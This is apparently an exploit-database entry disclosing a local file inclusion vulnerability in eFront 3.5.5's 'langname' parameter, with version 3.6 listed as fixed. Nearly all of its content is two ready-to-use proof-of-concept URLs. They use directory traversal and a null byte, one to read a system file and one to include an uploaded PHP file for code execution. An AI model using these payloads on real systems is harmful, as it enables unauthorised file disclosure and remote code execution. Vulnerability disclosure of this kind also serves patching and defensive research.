id: 11341
date: 03/17/2010
title: eFront 'langname' Parameter Local File Include Vulnerability
author: n/a
cves: 

============================================================
eFront 'langname' Parameter Local File Include Vulnerability
============================================================

Vulnerable:  	 eFront eFront 3.5.5
Not Vulnerable: 	eFront eFront 3.6

http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=a/../../../../../../boot.ini%00
http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=../../../../upload/student/message_attachments/Sent/1266862529/malicious.php.inc%00 



#  0day.today [2023-03-24]  #